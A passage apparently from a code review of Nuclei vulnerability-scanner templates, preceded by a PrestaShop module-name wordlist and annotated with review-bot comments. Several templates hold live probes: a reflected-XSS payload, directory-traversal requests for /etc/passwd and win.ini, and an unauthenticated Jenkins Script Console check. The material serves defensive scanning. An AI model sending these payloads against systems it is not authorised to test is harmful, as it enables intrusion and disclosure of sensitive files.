fieldpopupnewsletter
fieldproductcates
fieldproductcomments
fieldsizechart
fieldslideshow
fieldspecialproduct
fieldspecialproductdeal
fieldstaticblocks
fieldstaticfooter
fieldtabcateslider
fieldtabproductsisotope
fieldtestimonials
fieldthemecustomizer
fieldvmegamenu
firebaseauthenticator
firstdata
followup
followup/mails/pt
fontmanager
fop_console
fop_customcss
frenet_prestashop
gadwords
gamification
gamifications
ganalytics
gapi
gapps
gateway-prestashop-module
globkurier
gmseofields
gointerpay
googletag
graphartichow
graphgooglechart
graphnvd3
graphvisifire
graphxmlswfcharts
gridhtml
gshoppingfeed
gsitemap
gwadvancedinvoice
hipay
hipaymobileivr
holidaysmode
homecategoriez
homefeatured
homepageadvertise
homepageadvertise2
homeslider
idx_config
ifthenpay_mbway
importerosc
iqitadditionaltabs
iqitaddthisplugin
iqitcompare
iqitcontactpage
iqitcookielaw
iqitcountdown
iqitcrossselling
iqitdashboardnews
iqitelementor
iqitemailsubscriptionconf
iqitextendedproduct
iqitfreedeliverycount
iqithtmlandbanners
iqitlinksmanager
iqitmegamenu
iqitpopup
iqitproductsnav
iqitproducttags
iqitsearch
iqitsizecharts
iqitsociallogin
iqitthemeeditor
iqitwishlist
jbx_menu
jk_opengraph
jph_mymodule
jro_homepageadvertise
jsonws
jxcompareproduct
jxwishlist
kbmarketplace
kiala
kialasmall
klikandpay
komfortkasse-prestashop
kuantokusta
labodata-prestashop
layerslider
lendingclub
lgcomments
lgfreeshippingzones
lgseoredirect
liveperson
loyalty
loyaltylion
mailalerts
mailjet
masseditproduct
mautic-prestashop
mcps_popup
mediafinanz
mercadopagobr
merchantware
migrationpro
mobfirst
modules
moloni
mondialrelay
monetivo-prestashop
ms_category_color
ms_products_override
multibanco
my_first_module_for_presta
myhreflang
netreviews
newsletter
newsletterpopupli
nimblepayment
nosto-prestashop
nostotagging
nqgatewayneteven
nvn_export_orders
odexportproducts
ogone
olark
onboarding
oneandonehosting
only18plus
openfactura-prestashop
openpayprestashop
orderfees_shipping
orderfiles
oscmigrationpro
ovhhosting
packlinkpro
pagesnotfound
pagseguro
paymentexample
paypal
paypalmx
paypalusa
payplug
paysera
payulatam
peinau-plugin-prestashop
pgc-prestashop
ph_blog_column_custom
ph_relatedposts
ph_simpleblog
phfbchat
phpist_github
phpistcustomerregistrationblocker
pigmbhpaymill
pixelcrush-prestashop
pixelfeed
pk_flexmenu
pk_vertflexmenu
plugin-prestashop-1.6.x
plugin-prestashop-1.7.x
posbestsellers
poscountdown
posfeaturedproducts
posfeatureproduct
posfraction
poslistcategories
poslistcategory
poslistcategoryproducts
poslogo
posmegamenu
posmodeproduct
posnewproducts
posproductcates
posrotatorimg
posscroll
possearchcategories
posslideshow
posslideshows
posspecialproduct
posspecialproducts
posspecialsproducts
posstaticblocks
posstaticfooter
postabcateslider
postabproduct
postabproductslider
postcodenl
postestimonials
posthemeoptions
posvegamenu
powatag
ppb
prestacollege
prestafraud
prestahop-module
prestaliexpress
prestapay
prestapopup
prestasex
prestashippingeasy
prestashop
prestashop-1.6
prestashop-1.6.1.6
prestashop-1.7
prestashop-auto-exploit
prestashop-clean-urls
prestashop-dashcalendar
prestashop-datalayer-tracking
prestashop-dotfiles
prestashop-ee
prestashop-exportorders
prestashop-homeyoutube
prestashop-intergration
prestashop-localeswitcher
prestashop-module
prestashop-multishopselector
prestashop-payment-integration-novalnet
prestashop-paymentrestrictionsip
prestashop-payrexx-gateway
prestashop-plugin
prestashop-pod-payment
prestashop-pod-sso
prestashop-seo-tk
prestashop-shopping-cart-message
prestashop-souin
prestashop-trovaprezzi
prestashop-youtube-module
prestashop17
prestasms
prestastats
pricealert
pricerounding
produck-prestashop-module
productcomments
productcover
productfinder16
productpageadverts
productpaymentlogos
productscategory
productsticker
producttooltip
protectedshops
przelewy24
ps-training
ps-yme
ps_WhatsappButton
ps_accounts
ps_advertising
ps_banner
ps_bestsellers
ps_brandlist
ps_buybuttonlite
ps_carriercomparison
ps_cashondelivery
ps_categoryproducts
ps_categorytree
ps_checkout
ps_checkpayment
ps_contactinfo
ps_crossselling
ps_currencyselector
ps_customeraccountlinks
ps_customersignin
ps_customtext
ps_dataprivacy
ps_emailalerts
ps_emailgenerator
ps_emailsmanager
ps_emailsubscription
ps_eventbus
ps_facebook
ps_facetedsearch
ps_faviconnotificationbo
ps_featuredproducts
ps_feeder
ps_googleanalytics
ps_imageslider
ps_languageselector
ps_legalcompliance
ps_linklist
ps_livetranslation
ps_mainmenu
ps_mbo
ps_metrics
ps_native
ps_newproducts
ps_pagaqui
ps_productinfo
ps_quality_checklist_opquast
ps_qualityassurance
ps_reminder
ps_rssfeed
ps_searchbar
ps_searchbarjqauto
ps_sharebuttons
ps_shoppingcart
ps_socialfollow
ps_specials
ps_supplierlist
ps_test
ps_themecusto
ps_viewedproduct
ps_wirepayment
psaddonsconnect
pscartabandonmentpro
pscleaner
psgdpr
psgiftcards
psograph
psphipay
pspixel
psrichsnippets
pssupport
rc_pganalytics
realexredirect
recaptcha
referralprogram
referralprogram/mails/pt
reforestaction
rem42_webservices
remarkety
revsliderprestashop
revws
safeshops
sakgiok_latinurls
sbe-challenge-phase4
scamstop
sd_eicmslinks
securitypatch
sekeywords
sellstrom
sendinblue
sendtoafriend
sensbitdhl
sensbitinpost
sensbitpaczkawruchu
seoexpert
seur
sfkhreflang
shiptomyid
shiptopay
shopgate
shopimporter
shoppingfluxexport
simplerecaptcha
simpleslideshow
simplifycommerce
sitemappro
skebby
skrill
smartblog
smartblogaddthisbutton
smartbloghomelatestnews
smprestaspeed
smseourl
social-login-prestashop
sociallikes
socialsharing
socolissimo
sofortbanking
solrsearch
soopabanners
soopamobile
stampsdotcom
statsbestcategories
statsbestcustomers
statsbestmanufacturers
statsbestproducts
statsbestsuppliers
statsbestvouchers
statscarrier
statscatalog
statscheckup
statsdata
statsequipment
statsforecast
statsgeolocation
statslive
statsnewsletter
statsorigin
statspersonalinfos
statsproduct
statsprofitmargin
statsregistrations
statssales
statssearch
statsstock
statsvisits
stickngo
storecommander
stripe_official
super-model
tagmanager
tawkto
tdpsthemeoptionpanel
text_simple
textmaster
themeconfigurator
themeinstallator
thirtybees-instamojo
tinkoffcredit1.6
tntcarrier
trackingfront
training
translatools
trustedshops
twenga
twengabid
twengafeed
upscarrier
uspbar
uspscarrier
vatnumber
videostab
vtermslideshow
vtermslidesshow
vtpayment
watermark
wdoptionpanel
welcome
wg24themeadministration
whatsapp
whyloginascustomer
xipblog
xipblogdisplayposts
yotpo
yousticeresolutionsystem
youtube_video
zeleriscarrier
zivosite
zopimfree
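Review bot: several entries are not PrestaShop module directory names but repository names picked up from elsewhere (`prestashop-auto-exploit`, `PrestaShop_1.6.0.9_Ukraine`, `my_first_module_for_presta`, `plugin-prestashop-1.6.x`, `prestashop-1.6.1.6`, `prestashop`, `modules`), and two contain sub-paths (`followup/mails/pt`, `referralprogram/mails/pt`) that will never hold a `config.xml`; prune those. `attributewizardpro.OLD`, `attributewizardpro_x` and the misspelt `attributwizardpro` look like backup-directory noise rather than distinct modules. The list also mixes case (`PayPal` and `paypal`); both are needed on case-sensitive filesystems, but sorting case-insensitively would make such pairs and other duplicates easier to spot.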

View File

@ -0,0 +1,31 @@
id: akamai-arl-xss
info:
name: Open Akamai ARL XSS
author: pdteam
severity: medium
tags: akamai,xss
reference: |
- https://github.com/war-and-code/akamai-arl-hack
- https://twitter.com/SpiderSec/status/1421176297548435459
- https://warandcode.com/post/akamai-arl-hack/
- https://github.com/cybercdh/goarl
- https://community.akamai.com/customers/s/article/WebPerformanceV1V2ARLChangeStartingFebruary282021?language=en_US
requests:
- method: GET
path:
- "{{BaseURL}}/7/0/33/1d/www.citysearch.com/search?what=x&where=place%22%3E%3Csvg+onload=confirm(document.domain)%3E"
matchers-condition: and
matchers:
- type: word
condition: and
words:
- '"><svg onload=confirm(document.domain)>'
- 'Suggestions for improving the results'
- type: word
part: header
words:
- 'text/html'
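Review bot: the test path embeds a third party's ARL (`www.citysearch.com/search?what=x&where=...`) and the body matcher `Suggestions for improving the results` depends on that site's current search page, so the template silently stops working when citysearch.com changes its markup, and every scan sends traffic to that site through the target. Per the references the issue is that the edge will fetch and serve an origin it does not own, so the check is more robust if the ARL points at a host the operator controls and the matcher only requires the reflected `"><svg onload=confirm(document.domain)>` plus `text/html`. There is also no `status` matcher; add `200` so a cached error page is not counted.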

View File

@ -0,0 +1,28 @@
id: zabbix-dashboards-access
info:
name: zabbix-dashboards-access
author: pussycat0x,vsh00t
severity: medium
description: View dashboard with guest login.
reference: |
- https://www.exploit-db.com/ghdb/5595
- https://packetstormsecurity.com/files/163657/zabbix5x-sqlxss.txt
tags: zabbix,unauth
requests:
- method: GET
path:
- "{{BaseURL}}/zabbix/zabbix.php?action=dashboard.list"
matchers-condition: and
matchers:
- type: word
words:
- "Create dashboard"
- "Zabbix SIA"
condition: and
- type: status
status:
- 200
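Review bot: the path is fixed to `/zabbix/zabbix.php?action=dashboard.list`, but Zabbix is commonly served at the web root, so add `{{BaseURL}}/zabbix.php?action=dashboard.list` as a second path. `Create dashboard` assumes the guest account is permitted to create dashboards, which is not a given, and `Zabbix SIA` is only the footer copyright; match on a dashboard-list element that renders for read-only guests and confirm the response is not the login form. The description should spell out that the finding is an enabled guest account with dashboard access, since the template name `zabbix-dashboards-access` is reused as `name:` and explains nothing.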

View File

@ -12,7 +12,6 @@ requests:
path:
- "{{BaseURL}}"
redirects: true
matchers-condition: and
matchers:
- type: word
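Review bot: this deletes `matchers-condition: and` without showing the rest of the matcher list; if the template still has more than one matcher, the default condition becomes `or`, and a status-code matcher alone would then produce a match on any page. Please confirm only a single matcher remains, or keep the line.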

View File

@ -9,7 +9,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/"
- "{{BaseURL}}"
redirects: true
matchers-condition: and
matchers:

View File

@ -0,0 +1,28 @@
id: apache-guacamole
info:
name: Apache Guacamole Login Page and version detection
author: r3dg33k
severity: info
tags: apache,guacamole,tech
requests:
- method: GET
path:
- "{{BaseURL}}/translations/en.json"
matchers-condition: and
matchers:
- type: word
words:
- 'Apache Guacamole'
- type: status
status:
- 200
extractors:
- type: regex
part: body
regex:
- '"VERSION":"[0-9]+\.2\.0"'
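Review bot: the version extractor `"VERSION":"[0-9]+\.2\.0"` matches only versions of the form `N.2.0` and has no capture group, so a 1.3.0 or 1.4.0 instance yields no version at all; use `"VERSION":"([0-9.]+)"` with `group: 1`. The name says `Login Page and version detection`, but the request fetches `/translations/en.json`, the client-side string bundle, and the matcher only looks for `Apache Guacamole` in it; rename it to plain detection, since the bundle is readable whether or not a login page is exposed.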

View File

@ -9,7 +9,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/"
- "{{BaseURL}}"
matchers-condition: and
matchers:

View File

@ -0,0 +1,25 @@
id: dolibarr-detect
info:
name: Dolibarr detect
author: pikpikcu
severity: info
tags: tech,dolibarr
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: regex
part: body
regex:
- '<title>Dolibarr - Login Dolibarr(.*)</title>'
extractors:
- type: regex
part: body
group: 1
regex:
- 'center">(.*)</td>'
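Review bot: the extractor `center">(.*)</td>` is a greedy, unanchored pattern over the whole login page and will capture whatever sits after the first `center">` up to the last `</td>` on that line, not necessarily the version; if the intent is the Dolibarr version shown on the login page, constrain it to `([0-9]+\.[0-9.]+)` and give the extractor a `name:` so the output field is meaningful. There is no `status` matcher either; the title regex is specific, but a `200` check costs nothing.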

View File

@ -9,7 +9,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/"
- "{{BaseURL}}"
matchers-condition: and
matchers:

View File

@ -1,3 +1,5 @@
id: getsimple-cms-detector
info:
name: GetSimple CMS Detector
author: philippedelteil

View File

@ -0,0 +1,24 @@
id: influxdb-detect
info:
name: InfluxDB Detect
author: pikpikcu
severity: info
tags: tech,influxdb
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>InfluxDB - Admin Interface</title>"
- type: status
status:
- 200
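Review bot: the title `InfluxDB - Admin Interface` belongs to the built-in web admin UI of the 1.x line, which was deprecated in 1.1 and removed in 1.3, so this template only detects old, unsupported installs and will not see InfluxDB 2.x, whose UI carries a different title; either state that scope in a `description` or add a second path and match for the 2.x UI.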

View File

@ -12,14 +12,16 @@ requests:
- "{{BaseURL}}/web/home.html"
- "{{BaseURL}}/index.html"
- "{{BaseURL}}/web/index.html"
- "{{BaseURL}}/web/manifest.json"
matchers-condition: and
matchers:
- type: word
words:
- "name=\"application-name\" content=\"Jellyfin\""
- "class=\"page homePage libraryPage allLibraryPage backdropPage pageWithAbsoluteTabs withTabs\""
- "The Free Software Media System"
condition: or
part: body
- type: status
status:
- 200
- 200

View File

@ -9,7 +9,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/"
- "{{BaseURL}}"
matchers-condition: and
matchers:

View File

@ -0,0 +1,24 @@
id: opensis-detect
info:
name: OpenSIS Detect
author: pikpikcu
severity: info
tags: tech,opensis
requests:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/opensis/index.php"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>openSIS Student Information System</title>"
- type: status
status:
- 200

View File

@ -11,6 +11,7 @@ requests:
path:
- "{{BaseURL}}/www/admin/"
matchers-condition: and
matchers:
- type: regex
part: body

View File

@ -9,7 +9,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/"
- "{{BaseURL}}"
matchers-condition: and
matchers:

View File

@ -9,7 +9,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/"
- "{{BaseURL}}"
matchers-condition: and
matchers:

View File

@ -9,7 +9,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/"
- "{{BaseURL}}"
matchers-condition: and
matchers:

View File

@ -0,0 +1,30 @@
id: wordpress-gotmls-detect
info:
name: Detect WordPress Plugin Anti-Malware Security and Bruteforce Firewall
author: vsh00t
reference: https://www.exploit-db.com/exploits/50107
severity: info
tags: wordpress,wp-plugin,gotmls
requests:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action={{randstr}}&file=../../../../../../../../../Windows/win.ini"
matchers-condition: and
matchers:
- type: word
words:
- "gotmls"
part: header
- type: status
status:
- 302
extractors:
- type: kval
part: header
kval:
- Location
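Review bot: the request sends a directory-traversal payload (`file=../../../../../../../../../Windows/win.ini`) while the template is named, tagged and rated as an `info` detection; the referenced exploit-db entry is about abusing this plugin's `file` parameter, so either make it a plain detection with a benign `file=` value, or make it a vulnerability check that verifies file content (`[fonts]` or `[extensions]` for `win.ini`, plus a Linux variant such as `/etc/passwd`) and rate it accordingly. As written, a `302` with `gotmls` in a header only proves the plugin handled the request, and extracting `Location` does not show whether the traversal was honoured; note also that `win.ini` exists only on Windows hosts.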

View File

@ -0,0 +1,23 @@
id: wso2-apimanager-detect
info:
name: WSO2 API Manager detect
author: righettod
severity: info
description: Try to detect the presence of a WSO2 API Manager instance via the version endpoint
tags: tech,wso2,api-manager
requests:
- method: GET
path:
- "{{BaseURL}}/services/Version"
matchers-condition: and
matchers:
- type: word
words:
- "version.services.core.carbon.wso2.org"
- type: status
status:
- 200
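Review bot: `version.services.core.carbon.wso2.org` is the namespace of the Version service shared by every WSO2 Carbon-based product (Identity Server, Enterprise Integrator, API Manager and others), so this matcher detects a Carbon server, not specifically API Manager. Match the product name the service returns in its response element (for API Manager it contains `WSO2 API Manager`) and add a regex extractor for the version string so the output is actually useful for the `api-manager` tag.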

View File

@ -9,8 +9,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/"
- "{{BaseURL}}:3000"
- "{{BaseURL}}"
matchers-condition: and
matchers:
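Review bot: dropping `{{BaseURL}}:3000` is right: `{{BaseURL}}` already carries scheme, host and any port the user supplied, so appending `:3000` produced `host:port:3000` on targets given with an explicit port and a duplicate request otherwise. If the default port matters for this technology, it belongs in the description or the input list, not in the path.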

View File

@ -0,0 +1,23 @@
id: jenkins-script
info:
name: Jenkins RCE due to accesible script functionality
author: philippedelteil
severity: critical
reference: https://hackerone.com/reports/403402
tags: jenkins,rce,devops
requests:
- method: GET
path:
- "{{BaseURL}}/script/"
matchers-condition: and
matchers:
- type: word
words:
- "println(Jenkins.instance.pluginManager.plugins)"
- "Scriptconsole"
condition: and
part: body
- type: status
status:
- 200
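Review bot: `accesible` in `name:` should be `accessible`, and the name promises RCE while the request only confirms that `/script/` renders the Script Console without authentication; that is the precondition for Groovy execution and justifies `critical`, but the name and a `description:` should say "unauthenticated Script Console access" so nobody reads the hit as proof of code execution. Please verify that `Scriptconsole` (one word, that casing) appears verbatim in the page, since `println(Jenkins.instance.pluginManager.plugins)`, the example text the console shows, already carries the match on its own.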

View File

@ -0,0 +1,24 @@
id: bems-api-lfi
info:
name: Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download
author: gy741
severity: high
description: The application suffers from an unauthenticated arbitrary file download vulnerability. Input passed through the fileName parameter through downloads endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks.
reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5657.php
tags: lfi
requests:
- method: GET
path:
- "{{BaseURL}}/api/downloads?fileName=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
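Review bot: `tags: lfi` is the only tag; add the vendor and product (`longjing`, `bems`) and `traversal` so the template is reachable through the same tag filters as the other vendor templates in this change. The regex matcher has no `part:`; it defaults to the body, which is intended, but write `part: body` for consistency with the rest of the file set. The issue is a path traversal in `fileName`, not an include, so `lfi` in the id is a misnomer; the `name:` line, `Remote Arbitrary File Download`, is the accurate description.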

View File

@ -4,6 +4,7 @@ info:
name: Adobe ColdFusion Debug Page XSS
author: dhiyaneshDK
severity: medium
description: The remote Adobe ColdFusion debug page has been left open to unauthenticated users, this could allow remote attackers to trigger a reflected cross site scripting against the visitors of the site.
reference: https://github.com/jaeles-project/jaeles-signatures/blob/master/common/coldfusion-debug-xss.yaml
tags: adobe,coldfusion,xss

Some files were not shown because too many files have changed in this diff